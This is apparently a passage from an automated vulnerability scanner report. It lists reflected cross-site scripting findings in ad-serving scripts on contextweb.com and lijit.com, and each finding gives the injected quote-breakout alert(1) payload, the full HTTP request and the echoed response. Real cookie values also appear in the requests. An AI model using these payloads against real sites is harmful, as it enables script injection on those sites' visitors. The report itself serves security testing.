Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP213
Last-Modified: Tue, 25 Oct 02011 16:48:03 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:14 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:54 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90924a2";alert(1)//97f0af79fc5";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLower
...[SNIP]...

3.66. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63007"%3balert(1)//20143b9261c was submitted in the cwpid parameter. This input was echoed as 63007";alert(1)//20143b9261c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=53645463007"%3balert(1)//20143b9261c&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Last-Modified: Tue, 25 Oct 02011 16:20:36 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:12 GMT
Content-Length: 8892
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:52 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="53645463007";alert(1)//20143b9261c";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="53645463007";alert(1)//20143b9261c";var ct="101928";var cf="728X90";var cn="1";
...[SNIP]...

3.67. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67ee2"%3balert(1)//21adaaad5aa was submitted in the cwpnet parameter. This input was echoed as 67ee2";alert(1)//21adaaad5aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=167ee2"%3balert(1)//21adaaad5aa&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Last-Modified: Tue, 25 Oct 02011 16:35:49 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:14 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:54 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="167ee2";alert(1)//21adaaad5aa";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var
...[SNIP]...

3.68. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0e31"%3balert(1)//0f0bf0ed21 was submitted in the cwrun parameter. This input was echoed as d0e31";alert(1)//0f0bf0ed21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200d0e31"%3balert(1)//0f0bf0ed21&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP206
Last-Modified: Tue, 25 Oct 02011 16:25:32 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:10 GMT
Content-Length: 8863
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:50 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200d0e31";alert(1)//0f0bf0ed21";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowe
...[SNIP]...

3.69. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35868"%3balert(1)//fff8b34fa18 was submitted in the cwtagid parameter. This input was echoed as 35868";alert(1)//fff8b34fa18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=10192835868"%3balert(1)//fff8b34fa18&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Last-Modified: Tue, 25 Oct 02011 16:16:07 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:15 GMT
Content-Length: 8892
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:55 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="10192835868";alert(1)//fff8b34fa18";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="10192835868";alert(1)//fff8b34fa18";var cf="728X90";var cn="1";var epid="1822";var e
...[SNIP]...

3.70. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf4b"%3balert(1)//5282da8c62b was submitted in the cwwidth parameter. This input was echoed as faf4b";alert(1)//5282da8c62b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728faf4b"%3balert(1)//5282da8c62b&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Last-Modified: Tue, 25 Oct 02011 16:18:13 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:13 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:53 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728faf4b";alert(1)//5282da8c62b";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().index
...[SNIP]...

3.71. http://tag.contextweb.com/TagPublish/getjs.aspx [publisherID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the publisherID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc618"%3balert(1)//6afeacdf2bf was submitted in the publisherID parameter. This input was echoed as bc618";alert(1)//6afeacdf2bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822bc618"%3balert(1)//6afeacdf2bf&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Last-Modified: Tue, 25 Oct 02011 16:13:59 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:16 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:56 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822bc618";alert(1)//6afeacdf2bf";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = window;
   
...[SNIP]...

3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [siteID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3d8e"%3balert(1)//b077b748e60 was submitted in the siteID parameter. This input was echoed as f3d8e";alert(1)//b077b748e60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543f3d8e"%3balert(1)//b077b748e60 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Last-Modified: Tue, 25 Oct 02011 16:38:21 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:18 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:58 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543f3d8e";alert(1)//b077b748e60";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = window;
       var _cwu = "unde
...[SNIP]...

3.73. http://www.lijit.com/delivery/fp [n parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cacd3"%3balert(1)//56c2717715 was submitted in the n parameter. This input was echoed as cacd3";alert(1)//56c2717715 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/fp?u=phytomedia&z=129604&n=1cacd3"%3balert(1)//56c2717715 HTTP/1.1
Host: www.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=3
Cookie: ljtrtb=eJyrVjJUslIytjAyNzY1tTAxMzcxMTUwNjIxUaoFAFBaBdA%3D; ljt_reader=1860442d61f8e1f2d8924f58549ca25b; OACAP=4578.2; OACCAP=593.1; tpro=eJx1kc1uhSAQhd9l1uSGH%2F%2Bfo7umIQRRSRRuUJs0xnfvDNbebrrjO8ycOQMHPFMc%2FOygO2B0oXeJToshhT9KyWBwNxXNycCMuVZpIUnjgoFAqDMUCI1WBYGqGahSF22GikHJ9XPeV0Ip0SkZm62s2S2JLTaYIWmz3MZm9SYgMJj8%2BrzVuE2UkqOFnfzcJxfIJkQqqBWDL3cNqbHCBxuXPIZrxUkWGEVxXWWQLYOKa8EvwgR4fMVsaUacZ3ctHWL4eYg%2FMiI6jsn0erVTDlmd2Lf6jXK8H%2FkEHbw5vMalNuiEElVRto3EJf69r7gU9fnxuzB%2By%2BZpl1c3gyX22sY9UBODT5dWH%2FE5QDw4nOc3CS%2BEEQ%3D%3D; ljt_csync=rtb_turn%3A1318368324%2Crtb_simplifi%3A1318368324%2Crtb_mmath%3A1318368324%2Crtb_media6%3A1318368324%2C1%3A1318368324; _OACAP[4578]=1; ljt_ts=t=1318368323052224

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:17:36 GMT
Server: PWS/1.7.3.7
X-Px: ms h0-s1041.p10-sjc ( h0-s1029.p10-sjc), ms h0-s1029.p10-sjc ( origin>CONN)
Cache-Control: max-age=7200
